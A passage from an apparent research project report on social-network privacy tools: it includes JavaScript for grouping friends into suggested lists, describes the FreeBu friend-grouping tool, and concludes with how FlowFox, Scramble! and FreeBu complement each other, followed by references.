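  const adj = new Map(people.map((p) => [p, new Set([p])]));
  for (const [a, b] of edges) { adj.get(a).add(b); adj.get(b).add(a); }
  const strong = new Map(people.map((p) => [p, []]));
  for (const [a, b] of edges) {
    if (similarity(adj, a, b) >= minSimilarity) { strong.get(a).push(b); strong.get(b).push(a); }
  }
  const seen = new Set(), groups = [];
  for (const start of people) {
    if (seen.has(start)) continue;
    const group = [], stack = [start];
    seen.add(start);
    while (stack.length) {
      const p = stack.pop();
      group.push(p);
      for (const q of strong.get(p)) if (!seen.has(q)) { seen.add(q); stack.push(q); }
    }
    groups.push(group.sort());
  }
  return groups.sort((x, y) => y.length - x.length || x[0].localeCompare(y[0]));
}

// Label = member count plus every attribute held by at least minShare of the
// members; a one-person community shows only "1", as in the text above.
function labelCommunity(group, profiles, minShare = 0.6) {
  if (group.length === 1) return '1';
  const counts = new Map();
  for (const p of group) {
    for (const v of new Set(profiles[p] || [])) counts.set(v, (counts.get(v) || 0) + 1);
  }
  const shown = [...counts]
    .filter(([, n]) => n / group.length >= minShare)
    .sort((x, y) => y[1] - x[1] || x[0].localeCompare(y[0]))
    .map(([v]) => v);
  return shown.length ? `${group.length}: ${shown.join(', ')}` : `${group.length}`;
}

// Suggested friend lists for the user to review and edit before publishing.
function suggestFriendLists(profiles, edges, minSimilarity = 0.5, minShare = 0.6) {
  return detectCommunities(profiles, edges, minSimilarity)
    .map((members) => ({ label: labelCommunity(members, profiles, minShare), members }));
}
```

Here `dan` holds both a school and a work attribute but lands only in the school list, and lowering `minSimilarity` to 0.2 merges the two groups through his single tie to `eve`. A suggested list decides who can see a post, so it needs the manual review step the tool provides.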
The user can also change the members of the groups by "dragging and dropping" friends from one red circle to another, as shown in Figure 7.

FreeBu and more detailed instructions can be downloaded via this link: https://dl.dropbox.com/u/62772548/FreeBu.zip.

4.3 Conclusion

People within one context often share some common traits or connections that the people from other contexts lack [12, 13]. Therefore, one important factor that can distinguish different contexts is the persons in it [11, 13]. Hence, with FreeBu, we provide an SNS user with an easy way to identify different groups of people among the user's contacts. The user can "fine-tune" the grouping structure according to his/her needs by intuitively dragging and dropping some bubbles (that represent people) into other bubbles (that represent groups),


change the group names, and eventually, the user can publish this grouping decision onto his/her Facebook account. This saves the user a significant amount of time by replacing the manual construction of friend lists. The user also gains an overview of his/her online friends, and is likely to post more appropriately to designated friends based on the groups. We believe that distinguishing different groups of people is a very important step towards online context management.

Figure 5: The overview of the user interface.

Figure 6: The user can add new groups at different levels of the star-tree: "New group" is added at level two, attached to the level-one circle labeled with "41"; "New group 1" is added at level one, directly attached to the "self" circle. The user can also edit the labels of the circles.

Figure 7: On the left, three individuals are initially assigned to three different groups; on the right, the user moves the three individuals into one group.

5 Overall conclusion

There have been several gaps in security and privacy protection for users of SNS. To answer the needs of users, service providers, and developers, three different software tools were developed. Each tool tried to offer a solution to another security problem.

First, the current web infrastructure does not provide adequate protection mechanisms against maliciously-behaving web scripts (e.g. malicious advertisements on online social network sites) that try to leak sensitive or confidential information from the user's browser towards the information-gathering endpoint of an adversary. In order to assist the helpless internet user, iMinds-DistriNet developed FlowFox, a fully functional web browser enhanced with information flow technology. In practice, FlowFox prevents web scripts from leaking sensitive or confidential information, according to a given user-defined policy. FlowFox has also been successfully applied in the context of an innovative privacy-enhanced social application platform by preventing de-anonymized information from leaving the browser towards social application platforms.

The second tool, i.e. Scramble!, is developed by COSIC for any SNS user. It can be used to protect the confidentiality and integrity of the users' messages, posts or any other content uploaded to the SNS by means of encryption. This way, no unauthorised party is able to access or modify those data. It is valuable because it is freely available, open source, easy to use and it can be used on different (SNS) platforms.

The third tool is called FreeBu and is developed by Dtai for Facebook users. It can be used to automatically generate friend lists for Facebook users. The user can gain an overview of his/her friends, reflect on this overview and modify the grouping structure. By doing so, the user makes more informed decisions on SNS.

Although it may seem that the use of one of the tools described above is enough to protect your privacy, the following example will show that all tools presented in this deliverable are complementary. Therefore, the SNS user will be most protected when using all three of the tools.

Imagine a 16-year-old girl, Alice, who just had the number of her mobile phone changed. Because she wants to communicate her new mobile number to all of her friends, she posts her new phone number on her Facebook profile page, with her privacy settings set to 'friends-only'. The next day, she received a message on her phone from her teacher, she was called by an employee of Facebook for


a customer satisfaction survey and by a phone company to convince her that choosing another provider would decrease her phone costs.

Although this scenario may sound quite unrealistic, all described consequences of posting a phone number on your SNS profile page are possible, even when using the privacy settings of your provider. Indeed, by posting the number, this information was not only visible to everyone Alice once accepted as a Facebook friend (including her teacher), but it was also leaked to the service provider (Facebook) and third companies having ads on her profile page (e.g. a phone company).

Now imagine that Alice and her friends had installed FreeBu, Scramble and FlowFox on their computers. First of all, by using FreeBu, she could easily make friend lists, something she might not have done without FreeBu because of the workload. These friend lists enable her to choose more specifically who she wants to share her phone number with. In choosing her privacy settings, she might then see that she wants to share her number only with her closest friends and family, and not with all her Facebook friends, including her teacher. It allows her to make a detailed and specific choice before sharing her phone number. Secondly, to prevent Facebook from seeing her phone number and to perpetuate the SNS privacy settings, she uses Scramble. Instead of only using the provider's privacy settings, she also encrypts her phone number, so that only her closest friends and family can decrypt the information. However, in this case, the advertising companies can still see her phone number by making a screenshot at the moment she has just typed in the message on her Facebook profile page, but before she scrambles the information. Therefore, she also uses FlowFox, preventing the advertisers from taking this kind of screenshot and preventing the personal information from being leaked.

This example clearly shows how the three tools presented in this deliverable are complementary and build towards a safer and more privacy-friendly SNS environment. This way, the open-source software developed by the technical partners of SPION addresses some of the main existing privacy and security concerns.

References

[1] Willem De Groef, Dominique Devriese, Nick Nikiforakis, and Frank Piessens. FlowFox: a Web Browser with Flexible and Precise Information Flow Control. In Proceedings of the ACM Conference on Computer and Communications Security (CCS), 2012.

[2] Dominique Devriese and Frank Piessens. Noninterference Through Secure Multi-Execution. In Proceedings of the IEEE Symposium on Security and Privacy, pages 109-124, 2010.

[3] Nick Nikiforakis, Luca Invernizzi, Alexandros Kapravelos, Steven Van Acker, Wouter Joosen, Christopher Kruegel, Frank Piessens, and Giovanni Vigna. You Are What You Include: Large-scale Evaluation of Remote JavaScript Inclusions. In Proceedings of the ACM Conference on Computer and Communications Security (CCS), 2012.

[4] Tom Reynaert, Willem De Groef, Dominique Devriese, Lieven Desmet, and Frank Piessens. PESAP: a Privacy Enhanced Social Application Platform. In Proceedings of the International Workshop on Security and Privacy in Social Networks (SPSN), 2012.

[5] Kapil Singh, Alexander Moshchuk, Helen J. Wang, and Wenke Lee. On the Incoherencies in Web Browser Access Control Policies. In Proceedings of the IEEE Symposium on Security and Privacy, pages 463-478, 2010.

[6] Mike Ter Louw, Karthik Thotta Ganesh, and V.N. Venkatakrishnan. AdJail: Practical Enforcement of Confidentiality and Integrity Policies on Web Advertisements. In Proceedings of the USENIX Security Symposium, pages 24-24, 2010.

[7] danah m. boyd. Taken Out of Context: American Teen Sociality in Networked Publics. Social Science Research Network Working Paper Series, February 2009. http://www.danah.org/papers/TakenOutOfContext.pdf [2012-08-08].

[8] Zachary Weinberg, Eric Y. Chen, Pavithra Ramesh Jayaraman, and Collin Jackson. I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history. In Proceedings of the IEEE Symposium on Security and Privacy, Oakland, CA, USA, May 2011.

[9] Alice E. Marwick and danah m boyd. I tweet honestly, I tweet passionately: Twitter users, context collapse, and the imagined audience. New Media & Society, 13(1):114-133, February 2011.

[10] Kate Raynes-Goldie. Aliases, creeping, and wall cleaning: Understanding privacy in the age of facebook. First Monday, 15(1), 2010. http://firstmonday.org/htbin/cgiwrap/bin/ojs/index.php/fm/article/view/2775/2432 [2012-08-08].

[11] B. Schilit, N. Adams, and R. Want. Context-aware computing applications. In Proceedings of the 1994 First Workshop on Mobile Computing Systems and Applications, WMCSA '94, pages 85-90, Washington, DC, USA, 1994. IEEE Computer Society.

[12] George Danezis. Inferring privacy policies for social networking services. In Proceedings of the 2nd ACM workshop on Security and artificial intelligence, AISec '09, pages 5-10, New York, NY, USA, 2009. ACM.

[13] Georg Groh. Contextual Social Networking. PhD thesis, University of Technology, Munich, 2012. Habilitation thesis in Computer Science.

[14] danah m. boyd. Networked privacy. Retrieved August 9, 2011, 2011. URL http://www.danah.org/papers/talks/2011/PDF2011.html.

[15] Amin Tootoonchian, Stefan Saroiu, Yashar Ganjali and Alec Wolman. Lockr: better privacy for social networks. In CoNEXT, pages 169-180, 2009.

[16] Amin Tootoonchian, Kiran Kumar Gollu, Stefan Saroiu, Yashar Ganjali and Alec Wolman. Lockr: social access control for web 2.0. In Proceedings of the first workshop on Online social networks (WOSN), pages 43-48, 2008.

[17] Saikat Guha, Kevin Tang and Paul Francis. NOYB: privacy in online social networks. In Proceedings of the first workshop on Online social networks (WOSN), pages 49-54, 2008.

[18] Wanying Luo, Qi Xie and Urs Hengartner. FaceCloak: An Architecture for User Privacy on Social Networking Sites. In CSE, pages 26-33, 2009.
